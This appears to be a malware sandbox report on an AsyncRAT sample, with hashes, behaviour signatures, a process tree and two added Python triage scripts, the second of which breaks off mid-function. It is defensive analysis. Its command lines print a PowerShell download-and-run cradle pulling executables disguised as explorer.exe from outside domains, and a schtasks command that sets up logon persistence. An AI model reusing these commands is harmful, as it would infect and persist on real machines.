memory/4004-38-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/4004-39-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4004-40-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/4912-42-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9c5f9e7437285aa87e4433bc7e0f9d7
SHA1 2363ddac1155a065a54dc6a0fc307d86bd88246b
SHA256 0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520
SHA512 7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2

C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat

MD5 de534067b6262e543715278e864405e1
SHA1 f574aedf1af8dd559e13c49b74e436a8c7371f60
SHA256 1d4dd497712d484440da7f1de1ccd15364c40fcc6b349fd3aa158a8397d93573
SHA512 8e9a0325f585e8a9ac01c26c78b29360bf43fa1a840249955aab865fe6fdca63885b7b584c53fa161b6f7c28e0c650fa1dd92e2c5d214e4b655717c1b56bd6e5

memory/4912-45-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1852-55-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1852-56-0x00000284F82A0000-0x00000284F82B0000-memory.dmp

memory/1852-57-0x00000284F82A0000-0x00000284F82B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e623e3603f24dc9b8549f420fe3c5aef
SHA1 782f48ac54014c8e165fc1f5c78bd128b7c9c640
SHA256 e40be6528731018eef4c05c5037d3164d87e33fb4d592d85de03cf71bb1980f7
SHA512 31f83dd471749e343f8ee21912f1aca206499ba415a9bfb6f1d14fe738d74d92deba452a6f76a14a830a5f6c4462c45e51622d50e87e0d59165a00d53a79a225

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/4140-62-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/4140-64-0x000000001B040000-0x000000001B050000-memory.dmp

memory/1852-66-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1328-67-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1712-68-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1712-69-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

memory/1712-70-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b5506533654486099b48ee036f9ef543
SHA1 768441bd2eb613df5b4e97d2d840726ca28b07f3
SHA256 d61f0401e469d696e9b1d27457a7e2682f399e2ca296f77e8743de23e4d9de4b
SHA512 514c722b0862672c7aa4cfb92243085fe058ea413a6001220008b71884ca8dec273ede232f05494f3a354446fc62e96b2472d476c5ee2f1d8e1e837c2aede9a6

memory/1712-90-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

memory/1712-92-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 68f7ed7a9faf5c82f2fc821a97f68087
SHA1 bb879765b9a0d1130ee1e269eeb617ad7db133d0
SHA256 112e64911ce2ebcb7327222eed8b30f516d22dc05167b625a473dec93712e6cb
SHA512 ff1b4735aceb582cd6d0e667794efc3371ce12b8bf23f456e7415ea97b707692bfefe040b963a44699d12a08d4b3f314858621b117e169355dd0e18c7e4a1e9d

memory/1328-95-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-96-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/1340-98-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp

memory/1340-99-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp

memory/1340-97-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-110-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1340-112-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-113-0x000000001B040000-0x000000001B050000-memory.dmp

memory/1884-114-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 72ce8e6d097c0c934ce5ffde536de571
SHA1 296f99fc5f5b8b04e24203ac3d059a72fd0face4
SHA256 b2c8a41d654533b61deb2e133a6ae2db78bf1a9949d65d405528179895f9aa18
SHA512 c7ae06d8cf60ba60e493a839d93b739d5c313efb227d3e85e8db124674ca362b0e198d7bdfc197dba37e255de40376237693052ba6f2d78d9219f1ffe9f0d385

memory/1884-125-0x0000023119B50000-0x0000023119B60000-memory.dmp

memory/1884-127-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3288-133-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3288-134-0x000001C4FF060000-0x000001C4FF070000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2578b2ca2525a3609fb41ad87f77409f
SHA1 75f907f5d330620918e5ce8126f73543fc9049f9
SHA256 3a0ed5d2741de47a225249afe38f0befa053e44d6f1792f17793188192ddfdf4
SHA512 272a28316eddc9360cc22d178a86b817db93848cf353980dccf85b681805a8cae949ae65080d4116baa52fe55c482b1906bcaae2e2fb3bf63ab01b92a1c3f775

memory/3288-140-0x000001C4FF060000-0x000001C4FF070000-memory.dmp

memory/3288-142-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-143-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 07:12

Reported

2024-04-18 07:15

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2600 (1 event) N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2688 (3 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2408 wrote to memory of 2572 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2600 wrote to memory of 2464 (3 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2592 wrote to memory of 3048 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2464 wrote to memory of 2944 (3 events) N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2944 wrote to memory of 2924 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
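The WriteProcessMemory rows above are the only place this report records which process started which: the sandbox logs one "wrote to memory of" event per call, so an ordinary process launch shows up as three identical rows. The script below is an added example, not sandbox output: it parses the rows as the sandbox emits them (embedded verbatim, repeats included), counts repeats instead of printing them, links each child to the parent that wrote to it, and renders the tree. Parents that are never written to in these rows (2408 and 2592) come out as separate roots, because the table does not say who started them.

```python
"""Rebuild the process tree behind the WriteProcessMemory rows above.

Added example for this report, not sandbox output. The sandbox logs one
'wrote to memory of' row per WriteProcessMemory call, so an ordinary
process launch appears as three identical rows. This script parses the
rows, counts repeats, links each child to the parent that wrote to it,
and renders the tree. Parents never written to in these rows (2408 and
2592) come out as separate roots: the table does not say who started them.
"""
import ntpath
import re
from collections import Counter, defaultdict

# Constructed input: the rows of the WriteProcessMemory table, verbatim.
EVENTS = r"""
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

EVENT_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)\s+\S+\s+(\S+)\s+(\S+)")

def parse_events(text):
    """Return (parent_pid, child_pid, parent_image, child_image) per row."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            parent, child, pimg, cimg = m.groups()
            events.append((int(parent), int(child), pimg, cimg))
    return events

def build_tree(events):
    """Link children to parents, keep image paths, count repeated writes."""
    children, images, counts = defaultdict(list), {}, Counter()
    for parent, child, pimg, cimg in events:
        counts[(parent, child)] += 1
        images.setdefault(parent, pimg)
        images.setdefault(child, cimg)
        if child not in children[parent]:
            children[parent].append(child)
    return children, images, counts

def roots(children):
    """PIDs that wrote to others but were never written to in these rows."""
    written_to = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in written_to)

def render_tree(children, images, counts):
    """One line per process, indented by depth, with the write count."""
    lines = []
    def walk(pid, depth, note=""):
        lines.append("    " * depth + f"{pid} {ntpath.basename(images[pid])}{note}")
        for child in children.get(pid, []):
            n = counts[(pid, child)]
            walk(child, depth + 1, f"  [{n} writes]" if n > 1 else "")
    for root in roots(children):
        walk(root, 0)
    return lines

if __name__ == "__main__":
    print("\n".join(render_tree(*build_tree(parse_events(EVENTS)))))
```

Run stand-alone it prints three trees: the sample (2192) launching cmd.exe for the dropped .bat, which runs timeout.exe and the self-copy system.exe, which in turn launches cmd.exe and four powershell.exe children; and the two cmd.exe roots 2408 (schtasks.exe) and 2592 (three powershell.exe), whose parent writes are not in this table.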

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
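The command lines in the Processes list carry the whole chain: a PowerShell WebClient download cradle that writes two payloads to %Temp% under names imitating explorer.exe (ExpIorer.exe has a capital I where explorer has an l), Start-Process on those files, a dropped .bat that sleeps with timeout before running the self-copy in AppData\Roaming, and schtasks registering that copy to run at every logon with /rl highest. The script below is an added example, not the sandbox's own tooling, that triages exactly these command lines (copied from the list above) against those behaviours. The rule names, the list of imitated binaries and the user-writable path markers are this example's own choices.

```python
"""Triage the command lines from the Processes list above.

Added example for this report, not the sandbox's own tooling. Each command line
is checked for behaviours visible on this page: a PowerShell WebClient download
cradle, a dropped name that imitates a Windows binary (ExpIorer.exe, capital I
for l), a payload started from Temp, a logon scheduled task pointing at a
user-writable executable with /rl highest, a dropped .bat run from Temp, and a
timeout delay. Rule names and the imitated-binary list are this example's own.
"""
import ntpath
import re

# Constructed input: command lines copied from the Processes list above.
COMMAND_LINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"',
    r'''"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit''',
    r"powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')",
    r"powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')",
    r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit''',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat""',
    r"timeout 3",
    r"""schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'""",
    r'"C:\Users\Admin\AppData\Roaming\system.exe"',
    r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'",
    r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'",
]

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)")
START_RE = re.compile(r"Start-Process\s+-FilePath\s+'([^']+)'")
SCHTASKS_RE = re.compile(r"schtasks(?:\.exe)?\s+/create\b(.*)", re.I)
TR_RE = re.compile(r"/tr\s+['\"]*([^'\"]+)", re.I)
BAT_RE = re.compile(r"cmd(?:\.exe)?\"?\s+/c\s+\"*([^\"]+\.bat)", re.I)
TIMEOUT_RE = re.compile(r"^\s*timeout(?:\.exe)?\s+(?:/t\s+)?(\d+)", re.I)
# Names droppers like to borrow; fold I/1 -> l and 0 -> o before comparing.
LEGIT = sorted({"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe", "dllhost.exe"})
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})
USER_WRITABLE = ("%temp%", "%appdata%", "\\appdata\\", "\\temp\\")

def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
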